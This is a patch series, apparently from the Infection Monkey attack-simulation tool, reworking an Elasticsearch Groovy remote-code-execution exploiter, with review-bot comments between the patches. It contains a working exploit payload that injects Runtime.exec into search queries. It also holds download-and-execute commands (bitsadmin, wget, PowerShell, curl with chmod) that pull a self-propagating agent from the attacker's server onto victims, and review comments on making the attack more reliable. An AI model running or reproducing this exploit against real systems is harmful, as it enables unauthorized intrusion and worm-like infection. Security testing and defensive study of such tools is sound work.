From 8ddfb03f270884f6015ba1a2492065f625c20b73 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 20 Jul 2018 18:15:15 +0300 Subject: [PATCH 01/10] Uploaded and modified standard web_rce code usage.Not working, not tested --- infection_monkey/exploit/elasticgroovy.py | 72 +++++++++++-------- infection_monkey/network/mssql_fingerprint.py | 3 +- 2 files changed, 44 insertions(+), 31 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 989ae5cdf..d056afb05 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -9,17 +9,17 @@ import logging import requests -from exploit import HostExploiter from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth +from exploit.web_rce import WebRCE __author__ = 'danielg' LOG = logging.getLogger(__name__) -class ElasticGroovyExploiter(HostExploiter): +class ElasticGroovyExploiter(WebRCE): # attack URLs BASE_URL = 'http://%s:%s/_search?pretty' MONKEY_RESULT_FIELD = "monkey_result" 
@@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter): def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - self._config = __import__('config').WormConfiguration - self.skip_exist = self._config.skip_exploit_if_file_exist - - def is_os_supported(self): - """ - Checks if the host is vulnerable. - Either using version string or by trying to attack - :return: - """ - if not super(ElasticGroovyExploiter, self).is_os_supported(): - return False + def exploit_host(self): + # self.exploit_host_linux() if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - major, minor, build = self.host.services[ES_SERVICE]['version'].split('.') - major = int(major) - minor = int(minor) - build = int(build) - if major > 1: + # We need a reference to the exploiter for WebRCE framework to use + exploiter = self.exploit + # Build url from host and elastic port(not https) + urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + vulnerable_urls = [] + for url in urls: + if WebRCE.check_if_exploitable(exploiter, url): + vulnerable_urls.append(url) + self._exploit_info['vulnerable_urls'] = vulnerable_urls + if not vulnerable_urls: return False - if major == 1 and minor > 4: - return False - if major == 1 and minor == 4 and build > 2: - return False - return self.is_vulnerable() - def exploit_host(self): - real_host_os = self.get_host_os() - self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters - if 'linux' in self.host.os['type']: - return self.exploit_host_linux() - else: - return self.exploit_host_windows() + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + LOG.info("Host %s was already infected under the current configuration, done" % self.host) + return True + + if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + return False + + data = 
WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + + # We can't use 'if not' because response may be '' + if data is not False and data['response'] == False: + return False + + if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + return False + + if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: + return False + + return True + + def exploit(self, url, command): + payload = self.JAVA_CMD % command + response = requests.get(url, data=payload) + result = self.get_results(response) + if not result: # not vulnerable + return False + return result[0] def exploit_host_windows(self): """ diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index 9409c2255..ea4370d24 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - + # TODO remove auto-return + return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout From 7e2cc86ab95c2d22440822ff85321dad1973c7fa Mon Sep 17 00:00:00 2001 From: Vakaris Date: Mon, 23 Jul 2018 12:04:18 +0300 Subject: [PATCH 02/10] Code cleaned and tested on ubuntu --- infection_monkey/exploit/elasticgroovy.py | 153 ---------------------- 1 file changed, 153 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index d056afb05..668a95ce3 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py 
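Review bot: The upload-failure test in the new exploit_host is inverted: `if data is not False and data['response'] == False` lets a `False` return from `WebRCE.upload_monkey` fall straight through to `data['path']` on the next line, which raises `TypeError` on a bool instead of returning False; it should read `if data is False or data['response'] is False: return False`. The new `exploit()` issues `requests.get(url, data=payload)` with no `timeout`, so a target that accepts the connection and then stalls blocks the exploiter indefinitely — pass an explicit timeout there. Note also that this hunk drops the `is_os_supported` gate on `self.host.services[ES_SERVICE]['version']` (1.x up to 1.4.2) and the `is_vulnerable` probe, so unless `check_if_exploitable` on the WebRCE side performs an equivalent check, the Groovy exec payload is now sent to every host with ES open regardless of version. The class continues past the hunk (`exploit_host_windows` is cut off at its docstring).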
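Review bot: The added `return False` before `assert isinstance(host, VictimHost)` short-circuits the fingerprint method whose docstring opens this hunk, so every MSSQL host is reported as not fingerprinted and the remainder of the method — including the assert — is unreachable. Even with the `# TODO remove auto-return` marker this is a debugging bypass that does not belong in the patch; the commit message itself says "Not working, not tested", and the two lines are only removed again in patch 04 of this series. If the UDP probe needs to be disabled while the Elasticsearch work is tested, do it through configuration rather than by editing the fingerprinter. The enclosing method begins before the hunk and continues after it.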
@@ -85,159 +85,6 @@ class ElasticGroovyExploiter(WebRCE): return False return result[0] - def exploit_host_windows(self): - """ - TODO - Will exploit windows similar to smbexec - :return: - """ - return False - - def exploit_host_linux(self): - """ - Exploits linux using similar flow to sshexec and shellshock. - Meaning run remote commands to copy files over HTTP - :return: - """ - uname_machine = str(self.get_linux_arch()) - if len(uname_machine) != 0: - self.host.os['machine'] = str(uname_machine.lower().strip()) # strip unicode characters - dropper_target_path_linux = self._config.dropper_target_path_linux - if self.skip_exist and (self.check_if_remote_file_exists_linux(dropper_target_path_linux)): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) - return True # return already infected - src_path = get_target_monkey(self.host) - if not src_path: - LOG.info("Can't find suitable monkey executable for host %r", self.host) - return False - - if not self.download_file_in_linux(src_path, target_path=dropper_target_path_linux): - return False - - self.set_file_executable_linux(dropper_target_path_linux) - self.run_monkey_linux(dropper_target_path_linux) - - if not (self.check_if_remote_file_exists_linux(self._config.monkey_log_path_linux)): - LOG.info("Log file does not exist, monkey might not have run") - - return True - - def run_monkey_linux(self, dropper_target_path_linux): - """ - Runs the monkey - """ - - cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1, location=dropper_target_path_linux) - cmdline += ' & ' - self.run_shell_command(cmdline) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) - if not (self.check_if_remote_file_exists_linux(self._config.dropper_log_path_linux)): - LOG.info("Log file does not exist, monkey might not have run") - - def 
download_file_in_linux(self, src_path, target_path): - """ - Downloads a file in target machine using curl to the given target path - :param src_path: File path relative to the monkey - :param target_path: Target path in linux victim - :return: T/F - """ - http_path, http_thread = HTTPTools.create_transfer(self.host, src_path) - if not http_path: - LOG.debug("Exploiter %s failed, http transfer creation failed." % self.__name__) - return False - download_command = '/usr/bin/curl %s -o %s' % ( - http_path, target_path) - self.run_shell_command(download_command) - http_thread.join(self.DOWNLOAD_TIMEOUT) - http_thread.stop() - if (http_thread.downloads != 1) or ( - 'ELF' not in - self.check_if_remote_file_exists_linux(target_path)): - LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) - return False - return True - - def set_file_executable_linux(self, file_path): - """ - Marks the given file as executable using chmod - :return: Nothing - """ - chmod = '/bin/chmod +x %s' % file_path - self.run_shell_command(chmod) - LOG.info("Marked file %s on host %s as executable", file_path, self.host) - - def check_if_remote_file_exists_linux(self, file_path): - """ - :return: - """ - cmdline = '/usr/bin/head -c 4 %s' % file_path - return self.run_shell_command(cmdline) - - def run_shell_command(self, command): - """ - Runs a single shell command and returns the result. 
- """ - payload = self.JAVA_CMD % command - result = self.get_command_result(payload) - LOG.info("Ran the command %s on host %s", command, self.host) - return result - - def get_linux_arch(self): - """ - Returns host as per uname -m - """ - return self.get_command_result(self.JAVA_GET_BIT_LINUX) - - def get_host_tempdir(self): - """ - Returns where to write our file given our permissions - :return: Temp directory path in target host - """ - return self.get_command_result(self.JAVA_GET_TMP_DIR) - - def get_host_os(self): - """ - :return: target OS - """ - return self.get_command_result(self.JAVA_GET_OS) - - def is_vulnerable(self): - """ - Checks if a given elasticsearch host is vulnerable to the groovy attack - :return: True/False - """ - result_text = self.get_command_result(self.JAVA_IS_VULNERABLE) - return 'java.lang.Runtime' in result_text - - def get_command_result(self, payload): - """ - Gets the result of an attack payload with a single return value. - :param payload: Payload that fits the GENERIC_QUERY template. - """ - result = self.attack_query(payload) - if not result: # not vulnerable - return "" - return result[0] - - def attack_query(self, payload): - """ - Wraps the requests query and the JSON parsing. - Just reduce opportunity for bugs - :return: List of data fields or None - """ - response = requests.get(self.attack_url(), data=payload) - result = self.get_results(response) - return result - - def attack_url(self): - """ - Composes the URL to attack per host IP and port. - :return: Elasticsearch vulnerable URL - """ - return self.BASE_URL % (self.host.ip_addr, ES_PORT) - def get_results(self, response): """ Extracts the result data from our attack From a54eedec113d914a458fc675e61052770dd8e5bf Mon Sep 17 00:00:00 2001 
From: Vakaris Date: Tue, 24 Jul 2018 15:55:34 +0300 Subject: [PATCH 03/10] Commands tested and working on windows. --- infection_monkey/exploit/elasticgroovy.py | 25 +++++++++++++++++------ 1 file changed, 19 insertions(+), 6 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 668a95ce3..51531957b 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -6,13 +6,14 @@ import json import logging - import requests - -from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE +from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED + +import copy +import re __author__ = 'danielg' @@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE): DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder + # Both commands are prepared for use in future development + RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): 
@@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE): if not vulnerable_urls: return False - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + # Extra escaping required: + config = copy.deepcopy(self._config) + config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" + config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" + + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): return False - data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + commands = {'windows': self.RDP_CMDLINE_HTTP, + 'linux': WGET_HTTP_UPLOAD} + + data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' if data is not False and data['response'] == False: @@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE): payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) - if not result: # not vulnerable + if not result: return False return result[0] From 76523e7379ce4652f77ecca478ba958c2aba5670 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Sat, 18 Aug 2018 16:49:33 +0300 Subject: [PATCH 04/10] Refactored elastic for latest framework changes --- infection_monkey/exploit/elasticgroovy.py | 28 +++++++------------ infection_monkey/network/mssql_fingerprint.py | 2 -- 2 files changed, 10 insertions(+), 20 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 51531957b..73fe359a5 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py 
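Review bot: The deep-copied config overrides `dropper_target_path_win_32` and `dropper_target_path_win_64` with hard-coded, pre-escaped `C:\\\\Windows\\\\monkey32.exe` / `monkey64.exe` values, so whatever the operator configured for the Windows dropper location is silently ignored by this exploiter, and both `check_remote_files` and `upload_monkey` operate on a path that differs from the configured one. Escaping for the Groovy/JSON payload belongs where the command string is assembled — `exploit()` — applied to the configured path (e.g. a backslash `re.sub` on `command`), not baked into a copy of the configuration. As written the `skip_exist` short-circuit can also report "already infected" for a path the configuration never named. The enclosing exploit_host starts before this hunk.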
@@ -8,11 +8,9 @@ import json import logging import requests from network.elasticfinger import ES_SERVICE, ES_PORT -from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED +from model import WGET_HTTP_UPLOAD -import copy import re __author__ = 'danielg' 
@@ -49,48 +47,42 @@ class ElasticGroovyExploiter(WebRCE): if ES_SERVICE not in self.host.services: LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) return False - # We need a reference to the exploiter for WebRCE framework to use - exploiter = self.exploit # Build url from host and elastic port(not https) - urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty']) + urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) vulnerable_urls = [] for url in urls: - if WebRCE.check_if_exploitable(exploiter, url): + if self.check_if_exploitable(url): vulnerable_urls.append(url) self._exploit_info['vulnerable_urls'] = vulnerable_urls if not vulnerable_urls: return False - # Extra escaping required: - config = copy.deepcopy(self._config) - config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" - config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" - - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): + if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True - if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): + if not self.set_host_arch(vulnerable_urls[0]): return False commands = {'windows': self.RDP_CMDLINE_HTTP, 'linux': WGET_HTTP_UPLOAD} - data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) + data = self.upload_monkey(vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' - if data is not False and data['response'] == False: + if data is not False and data['response'] is False: return False - if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: + if self.change_permissions(vulnerable_urls[0], data['path']) is False: return False - if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], 
exploiter, data['path'], True) == False: + if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: return False return True def exploit(self, url, command): + command = re.sub(r"\\", r"\\\\\\\\", command) payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index ea4370d24..f973f3d87 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,8 +29,6 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - # TODO remove auto-return - return False assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout From 56b3190cb58eb4e0c01e18773e8feb6ca304c5a6 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Fri, 24 Aug 2018 14:27:48 +0300 Subject: [PATCH 05/10] Refactored elastic according to latest web_rce framework changes. Tested on windows and linux --- infection_monkey/exploit/elasticgroovy.py | 58 +++++++---------------- 1 file changed, 16 insertions(+), 42 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 73fe359a5..f83fdc3e7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -7,13 +7,12 @@ import json import logging import requests -from network.elasticfinger import ES_SERVICE, ES_PORT from exploit.web_rce import WebRCE from model import WGET_HTTP_UPLOAD import re -__author__ = 'danielg' +__author__ = 'danielg, VakarisZ' LOG = logging.getLogger(__name__) 
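Review bot: The new `command = re.sub(r"\\", r"\\\\\\\\", command)` in `exploit()` escapes only backslashes, yet `command` is interpolated into a Groovy double-quoted literal (`exec(\\"%s\\")` in `JAVA_CMD`) that itself sits inside a JSON string, so a `"` anywhere in the command — a configured dropper path or an upload-template argument — still terminates both literals and the request is rejected or runs a truncated command. Escape double quotes at both layers too, or build the script body with `json.dumps` so the JSON level is handled uniformly and only the Groovy-level escaping is done by hand. The `if data is not False and data['response'] is False` check earlier in the hunk is still inverted: when `upload_monkey` returns False execution reaches `data['path']` and raises `TypeError`; it should be `if data is False or data['response'] is False`. `requests.get(url, data=payload)` also still has no `timeout`. The `exploit` method continues past the end of the hunk.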
@@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE): % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' - DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder - # Both commands are prepared for use in future development RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ + r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - def exploit_host(self): - # self.exploit_host_linux() - if ES_SERVICE not in self.host.services: - LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) - return False - # Build url from host and elastic port(not https) - urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) - vulnerable_urls = [] - for url in urls: - if self.check_if_exploitable(url): - vulnerable_urls.append(url) - self._exploit_info['vulnerable_urls'] = vulnerable_urls - if not vulnerable_urls: - return False + def get_exploit_config(self): + exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() + exploit_config['dropper'] = True + exploit_config['url_extensions'] = ['_search?pretty'] + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + return exploit_config - if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) - return True - - if not self.set_host_arch(vulnerable_urls[0]): - return False - - commands = {'windows': self.RDP_CMDLINE_HTTP, - 'linux': WGET_HTTP_UPLOAD} - - data = 
self.upload_monkey(vulnerable_urls[0], commands) - - # We can't use 'if not' because response may be '' - if data is not False and data['response'] is False: - return False - - if self.change_permissions(vulnerable_urls[0], data['path']) is False: - return False - - if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: - return False - - return True + def get_open_service_ports(self, port_list, names): + # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service + valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names) + elastic_service = [service for service in self.host.services if 'elastic-search' in service][0] + elastic_port = [elastic_service.lstrip('elastic-search-'), False] + valid_ports.append(elastic_port) + return valid_ports def exploit(self, url, command): command = re.sub(r"\\", r"\\\\\\\\", command) From d4262ef0bd0c3d2a6321560844af325c0472f48a Mon Sep 17 00:00:00 2001 From: Vakaris Date: Sat, 25 Aug 2018 18:13:44 +0300 Subject: [PATCH 06/10] Removed unused constants --- infection_monkey/exploit/elasticgroovy.py | 6 ------ 1 file changed, 6 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index f83fdc3e7..db07e00e1 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py 
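Review bot: `get_open_service_ports` indexes `[service for service in self.host.services if 'elastic-search' in service][0]`, so a host with no Elasticsearch service raises `IndexError` instead of returning the ports the base class already collected; test the list (or `ES_SERVICE in self.host.services`, whose import this patch removes in its first hunk) before appending. `elastic_service.lstrip('elastic-search-')` is also the wrong tool: `str.lstrip` removes any leading characters drawn from the given set, not a prefix, and only yields the port here because no digit is in that set — use `elastic_service[len('elastic-search-'):]` or append the known `ES_PORT` directly. Both `get_exploit_config` and `get_open_service_ports` are complete within the hunk; `exploit` continues past it.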
@@ -19,16 +19,10 @@ LOG = logging.getLogger(__name__) class ElasticGroovyExploiter(WebRCE): # attack URLs - BASE_URL = 'http://%s:%s/_search?pretty' MONKEY_RESULT_FIELD = "monkey_result" GENERIC_QUERY = '''{"size":1, "script_fields":{"%s": {"script": "%%s"}}}''' % MONKEY_RESULT_FIELD - JAVA_IS_VULNERABLE = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.Runtime\\")' - JAVA_GET_TMP_DIR = \ - GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"java.io.tmpdir\\")' - JAVA_GET_OS = GENERIC_QUERY % 'java.lang.Math.class.forName(\\"java.lang.System\\").getProperty(\\"os.name\\")' JAVA_CMD = GENERIC_QUERY \ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" - JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' # Both commands are prepared for use in future development RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' From 4d6472cce10e7c34fb743dc1720f208eb312b3d0 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 16:52:29 +0300 Subject: [PATCH 07/10] Ports are now taken from elastic_fingerprint module --- infection_monkey/exploit/elasticgroovy.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index db07e00e1..74be84a79 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -9,6 +9,7 @@ import logging import requests from exploit.web_rce import WebRCE from model import WGET_HTTP_UPLOAD +from network.elasticfinger import ES_PORT, ES_SERVICE import re 
@@ -44,9 +45,8 @@ class ElasticGroovyExploiter(WebRCE): def get_open_service_ports(self, port_list, names): # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names) - elastic_service = [service for service in self.host.services if 'elastic-search' in service][0] - elastic_port = [elastic_service.lstrip('elastic-search-'), False] - valid_ports.append(elastic_port) + if ES_SERVICE in self.host.services: + valid_ports.append([ES_PORT, False]) return valid_ports def exploit(self, url, command): From 304f5bd64353a7702114ff2d8c474aab34d6ae1e Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 17:14:55 +0300 Subject: [PATCH 08/10] Removed unused commands --- infection_monkey/exploit/elasticgroovy.py | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 74be84a79..c4cc3e4a7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD +from model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP from network.elasticfinger import ES_PORT, ES_SERVICE import re @@ -25,11 +25,6 @@ class ElasticGroovyExploiter(WebRCE): JAVA_CMD = GENERIC_QUERY \ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" - # Both commands are prepared for use in future development - RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ - r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" - _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): 
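Review bot: The new gate `if ES_SERVICE in self.host.services` only confirms that the fingerprinter saw an Elasticsearch service; it never consults `self.host.services[ES_SERVICE]['version']`, which the `is_os_supported` removed in patch 01 used to restrict the attack to 1.x builds up to 1.4.2, so the exec payload is now sent to every Elasticsearch host regardless of version. Unless `check_if_exploitable` in WebRCE already performs an equivalent probe, restore the comparison here before appending the port, e.g. parse `major, minor, build = (int(x) for x in self.host.services[ES_SERVICE]['version'].split('.'))` and skip the host when `(major, minor, build) > (1, 4, 2)`. Appending the fixed `ES_PORT` also assumes the fingerprinter only ever records that port; if it can report another one, that information is discarded here. The method is complete within the hunk.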
@@ -39,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config['dropper'] = True exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP} return exploit_config def get_open_service_ports(self, port_list, names): From 477836e1c996e280c1f7b8c6ad9729ea6020e37b Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 17:19:51 +0300 Subject: [PATCH 09/10] Blank newline added to match source file --- infection_monkey/network/mssql_fingerprint.py | 1 + 1 file changed, 1 insertion(+) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index f973f3d87..d9361b033 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,6 +29,7 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ + assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout From a2bebca4bcbf94f6f682aac0156e05850256a80a Mon Sep 17 00:00:00 2001 From: Vakaris Date: Wed, 29 Aug 2018 17:20:43 +0300 Subject: [PATCH 10/10] spaces removed --- infection_monkey/network/mssql_fingerprint.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/infection_monkey/network/mssql_fingerprint.py b/infection_monkey/network/mssql_fingerprint.py index d9361b033..9409c2255 100644 --- a/infection_monkey/network/mssql_fingerprint.py +++ b/infection_monkey/network/mssql_fingerprint.py @@ -29,7 +29,7 @@ class MSSQLFinger(HostFinger): Discovered server information written to the Host info struct. True if success, False otherwise. """ - + assert isinstance(host, VictimHost) # Create a UDP socket and sets a timeout